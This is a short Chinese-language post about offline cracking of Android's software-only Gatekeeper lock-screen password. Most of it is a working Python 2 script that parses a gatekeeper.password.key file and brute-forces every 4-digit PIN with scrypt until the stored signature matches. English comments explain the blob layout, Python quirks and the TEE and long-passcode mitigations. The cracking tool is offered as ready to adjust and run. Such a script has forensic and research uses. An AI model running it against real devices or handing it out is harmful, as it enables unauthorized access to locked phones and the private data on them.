安卓很早就开始启用了gatekeeper的锁屏密码机制。在未启用TEE的情况下，默认使用“软加密”的方式，因此可以离线破解出原始密码；知道原始密码在某些情况下还是比较有用的。以下是破解实例，请自行调整。
import struct
import binascii
import scrypt
# scrypt work-factor parameters, passed positionally to scrypt.hash() below
# as (N, r, p): CPU/memory cost, block size and parallelism.  They have to be
# the same values the software Gatekeeper used when it produced the key file,
# otherwise no candidate can ever match -- confirm against the target build.
# (The trailing semicolons are legal but unidiomatic Python.)
N = 16384;
r = 8;
p = 1;
# Read the whole key blob as bytes.  NOTE: the handle is never closed
# anywhere in the script; a `with open(...) as f:` block would be the usual form.
f = open('gatekeeper.password.key', 'rb')
blob = f.read()
# Blob layout as this script assumes it: 17-byte metadata | 8-byte salt |
# 32-byte signature (57 bytes in total).  The '<' byte-order prefix has no
# effect on fixed-size 's' fields.  unpack_from raises struct.error if the
# file is shorter than 57 bytes.
s = struct.Struct('<'+'17s 8s 32s')
(meta, salt, signature) = s.unpack_from(blob)
# Enumerate every 4-digit PIN from 0000 to 9999 in order (10,000 candidates)
# and stop at the first one whose scrypt output matches the stored signature.
# Per the note above, this offline comparison only reproduces the software
# ("soft") Gatekeeper path; with a TEE-backed Gatekeeper the signature is
# expected to depend on a device-bound key that is not in the blob, so it
# cannot be recomputed from the file alone.  Hardware-backed Gatekeeper and a
# longer passcode are the corresponding mitigations.
for one in "0123456789":
    for two in "0123456789":
        for three in "0123456789":
            for four in "0123456789":
                password = one + two + three + four;
                # Python 2 print statement; the script is Python 2 throughout
                # (see also .encode('hex') below, which exists only on Python 2 str).
                print 'pass: %s' % password
                # scrypt input is the 17-byte metadata followed by the ASCII PIN.
                to_hash = meta
                to_hash += password
                # `hash` shadows the builtin of the same name.
                hash = scrypt.hash(to_hash, salt, N, r, p)
                # Prints both sides of the comparison for every candidate.
                print 'signature %s' % signature.encode('hex')
                print 'Hash: %s' % hash[0:32].encode('hex')
                # Only the first 32 bytes of the scrypt output are compared
                # against the stored signature.
                if hash[0:32] == signature:
                    print "OK"
                    # site-provided exit(); sys.exit() is the portable spelling.
                    # The open file handle is dropped here without being closed.
                    exit()